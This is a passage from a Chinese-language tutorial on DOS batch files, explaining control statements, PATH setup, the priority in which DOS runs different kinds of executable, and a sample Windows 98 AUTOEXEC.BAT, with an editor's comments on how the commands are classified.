52、件編輯工具創(chuàng)建和修改批處理文件。 = 注 = 批處理文件中完全可以使用非dos命令，甚至可以使用不具有可執(zhí)行特性的普通數(shù)據(jù)性文件，這緣于windows系統(tǒng)這個新型解釋平臺的涉入，使得批處理的應(yīng)用越來越"邊緣化"。所以我們討論的批處理應(yīng)該限定在dos環(huán)境或者命令行環(huán)境中，否則很多觀念和設(shè)定都需要做比較大的變動。 = 其次，批處理文件是一種簡單的程序，可以通過條件語句(if)和流程控制語句(goto)來控制命令運行的流程，在批處理中也可以使用循環(huán)語句(for)來循環(huán)執(zhí)行一條命令。當(dāng)然，批處理文件的編程能力與C語言等編程語句比起來是十分有限的，也是十分不規(guī)范的。批處理的程序語句就

53、是一條條的DOS命令（包括內(nèi)部命令和外部命令），而批處理的能力主要取決于你所使用的命令。 = 注 = 批處理文件(batch file)也可以稱之為批處理程序(batch program)，這一點與編譯型語言有所不同，就c語言來說，擴(kuò)展名為c或者cpp的文件可以稱之為c語言文件或者c語言源代碼，但只有編譯連接后的exe文件才可以稱之為c語言程序。因為批處理文件本身既具有文本的可讀性，又具有程序的可執(zhí)行性，這些稱謂的界限是比較模糊的。 = 第三，每個編寫好的批處理文件都相當(dāng)于一個DOS的外部命令，你可以把它所在的目錄放到你的DOS搜索路徑(path)中來使得它可以在任意位置運行。一個良好的習(xí)慣是

54、在硬盤上建立一個bat或者batch目錄（例如C:BATCH），然后將所有你編寫的批處理文件放到該目錄中，這樣只要在path中設(shè)置上c:batch，你就可以在任意位置運行所有你編寫的批處理程序。 = 注 = 純以dos系統(tǒng)而言，可執(zhí)行程序大約可以細(xì)分為五類，依照執(zhí)行優(yōu)先級由高到低排列分別是：DOSKEY宏命令（預(yù)先駐留內(nèi)存），COMMAND.COM中的內(nèi)部命令（根據(jù)內(nèi)存的環(huán)境隨時進(jìn)駐內(nèi)存），以com為擴(kuò)展名的可執(zhí)行程序（由 直接載入內(nèi)存），以exe位擴(kuò)展名的可執(zhí)行程序（由 重定位后載入內(nèi)存），以bat位擴(kuò)展名的批處理程序（由 解釋分析，根據(jù)其內(nèi)容按優(yōu)先級順序調(diào)用第2，3，4，5種可執(zhí)行程序，分

55、析一行，執(zhí)行一行，文件本身不載入內(nèi)存） = 第四，在DOS和Win9x/Me系統(tǒng)下，C:盤根目錄下的AUTOEXEC.BAT批處理文件是自動運行批處理文件，每次系統(tǒng)啟動時會自動運行該文件，你可以將系統(tǒng)每次啟動時都要運行的命令放入該文件中，例如設(shè)置搜索路徑，調(diào)入鼠標(biāo)驅(qū)動和磁盤緩存，設(shè)置系統(tǒng)環(huán)境變量等。下面是一個運行于windows 98下的autoexec.bat的示例： ECHO OFF PATH C:windows;C:windowsCOMMAND;C:UCDOS;C:DOSTools;C:SYSTOOLS;C:WINTOOLS;C:BATCH LH SMARTDRV.EXE /X LH D

56、OSKEY.COM /insert LH CTMOUSE.EXE SET TEMP=D:TEMP SET TMP=D:TEMP = 注 = AUTOEXEC.BAT為DOS系統(tǒng)的自動運行批處理文件，由COMMAND.COM啟動時解釋執(zhí)行； 而在Win9x環(huán)境中，不僅增加支持了 DOSSTART.BAT, WINSTART.BAT 等許多其它自動運行的批處理文件，對AUTOEXEC.BAT 也增加了 .DOS .W40 .BAK .OLD .PWS 等許多變體以適應(yīng)復(fù)雜的環(huán)境和多變的需求。 = willsort 編注 = 以下關(guān)于命令的分類，有很多值得推敲的地方。常用命令中的本不是命令，而dir、copy等也很常用的命令卻沒有列入, 而特殊命令中所有命令對我來說都是常用命令。建議將批處理所引用的命令分為內(nèi)部命令、外部命令、第三方程序三類。而內(nèi)部命令和外部命令中別有一類是專用于或常用于批處理中的命令可稱之為"批處理命令"。